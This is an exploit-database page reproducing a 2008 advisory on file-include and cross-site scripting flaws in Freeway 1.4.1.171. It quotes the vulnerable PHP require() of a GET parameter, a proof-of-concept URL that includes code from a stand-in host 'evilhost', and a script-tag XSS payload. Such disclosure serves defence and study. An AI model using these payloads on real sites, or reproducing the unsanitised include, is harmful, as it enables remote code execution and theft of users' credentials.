header-logo
Suggest Exploit
vendor:
Freeway
by:
SecurityFocus
7.5
CVSS
HIGH
Multiple Remote/Local File Include and Cross-Site Scripting
79, 98
CWE
Product Name: Freeway
Affected Version From: Freeway 1.4.1.171
Affected Version To: Other versions may also be vulnerable.
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Freeway Multiple Remote/Local File Include and Cross-Site Scripting Vulnerabilities

Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be kept up-to-date with the latest security patches.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30676/info

Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

Freeway 1.4.1.171 is affected; other versions may also be vulnerable. 

1. Multiple Remote/Local File Include

Example:

...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...

if($command!="")
{
switch($command){
...
case 'include_page':
require($HTTP_GET_VARS['include_page']);
break;
...

http://www.example.com/[installdir]/admin/create_order_new.php=http://evilhost/info.php

Local File Include vulnerability found in script  includes/events_application_top.php

2. Linked XSS vulnerability

Example

http://www.example.com/[installdir]/admin/search_links.php"<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>

Navigation

Suggest Exploit

Services By CQR